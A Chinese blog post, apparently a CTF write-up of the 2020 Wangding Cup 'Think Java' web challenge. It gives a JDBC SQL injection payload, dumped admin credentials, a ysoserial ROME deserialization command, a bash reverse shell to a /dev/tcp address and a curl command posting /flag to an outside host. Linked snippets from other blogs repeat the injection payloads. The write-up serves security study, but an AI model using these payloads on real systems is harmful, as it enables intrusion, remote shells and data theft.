[网鼎杯 2020 朱雀组]Think Java

最新推荐文章于 2024-05-23 09:45:45 发布
最新推荐文章于 2024-05-23 09:45:45 发布
阅读量1k 收藏 1
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/114890169
版权

源码中给了提示:
Swagger UI:提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。
在这里插入图片描述
搜索一波默认目录
在这里插入图片描述

发现存在
/swagger-ui.html
在这里插入图片描述
一共有这三个路由

审计源码发现sqlDict类中有个sql注入
在这里插入图片描述

在这里插入图片描述
这是一个JDBC sql注入

payload

myapp#' union select 1#

为什么这样能,放上这位师傅的博客
讲解
在这里插入图片描述

在这里插入图片描述
把用户密码注出来
admin/admin@Rrrr_ctf_asde
拿去登录
在这里插入图片描述
发现响应头里有一段经过base64编码的java反序列化的内容
在这里插入图片描述
将这段内容拿去current页面验证
在这里插入图片描述
后面不会做了,万万没想到这题居然可以拿ysoserial直接打
这个工具集成了所有的java反序列化工具
这题是用ROME打的
想尝试弹shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

看到一个网址专门针对这种情况做了解决
网址

java -jar ysoserial.jar ROME "那个网址给的payload" |base64

在这里插入图片描述

当然还可以用curl来进行外带

java -jar ysoserial.jar ROME "curl http://ip:port -d @/flag" |base64
penson by 小乌
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
Ctfhub-think_java-2020网鼎杯-朱雀
weixin_54227009的博客
12-27 482
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 362
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
CTF网鼎杯2020朱雀 thinkjava思路记录
最新发布
c0529的博客
05-23 963
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3570
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2498
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4793
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
zhuque:朱雀-LeetCode刷题
04-08
朱雀:LeetCode刷题指南》 在编程领域,LeetCode是一个广受开发者喜爱的在线平台,它提供了丰富的算法题目,旨在提升程序员的编程能力和解决问题的技巧。本指南主要聚焦于使用Java语言在LeetCode上进行刷题的实践...
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3001
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
CTFHub靶场 --题目:think_java
weixin_52221158的博客
08-18 495
推测与sql注入有关,打开sqldict.class,发现连接数据库的代码 以及数据库查询语句。让你看的是那个返回包里面的ctfhub账户名,说明这个账户名是被反序列化过后得到值。返回data,以rO0AB开头,java序列化,在身份认证处提交。相当于把服务器的token数据先base64解密,再反序列化。生成bin文件,在进行base64加密,文件更改名字即可。此处为请求地址,加入请求,并结合代码加入注入代码。开始入手,burp抓包,发至repeater。在该接口测试登录,try it out。...
2020网鼎杯朱雀云顿WP(入门向)
qq346812142的博客
05-18 1754
@[TOC](2020网鼎杯朱雀 云顿(yundun) wp 入门向) 学习PWN也有两年左右时间了,一看就会,一做就废。这次网鼎杯朱雀结束后拿到一道pwn的题目yundun,尝试自己做了一下,在几个小时内做出来了,虽然没有正式参赛,但是也算是自己做出来的第一道大赛题目,值得纪念一下。后来才发现有更简单的方法(使用格式化字符串漏洞直接利用),但是不影响技术微微 提升。废话不多说,直接进入主题。 二进制分析 题目只给了一个二进制pwn,没有glibc,估计一会儿需要自行确定glibc版本。用checkse
CTF之think_java反序列化完整案例
qq_36585338的博客
11-30 799
【代码】CTF之think_java反序列化完整案例。
第二届网鼎杯(第三场:朱雀)Think Java
a3320315的博客
05-20 1698
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以 解题过程 先扫一下目录 得到swagger-ui.html 发现几个api接口 sql注入得到密码 源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库 #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证) 最终: jdbc:mysql://mysqldbserver:3306/myapp#‘ union select
Java安全-Java In CTF([网鼎杯 2020 青龙]filejava、[网鼎杯 2020 朱雀]Think Java
Love&Share
05-04 2169
文章目录[网鼎杯 2020 青龙]filejava[网鼎杯 2020 朱雀]Think Java [网鼎杯 2020 青龙]filejava 存在一个 UploadServlet 通过修改上传文件名,构造报错输出 web 目录 正常上传文件 /DownloadServlet?filename=ac6b647b-b31a-4ee7-8b86-9bbdba110a71_1.jpg 尝试任意文件读取,对于 Java 项目来说可以尝试读取 /WEB-INF/web.xml 配置文件 正常来说 web..
buuctf Java逆向解密(从0开始)
weixin_51660080的博客
12-07 656
buuctf java逆向解密
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值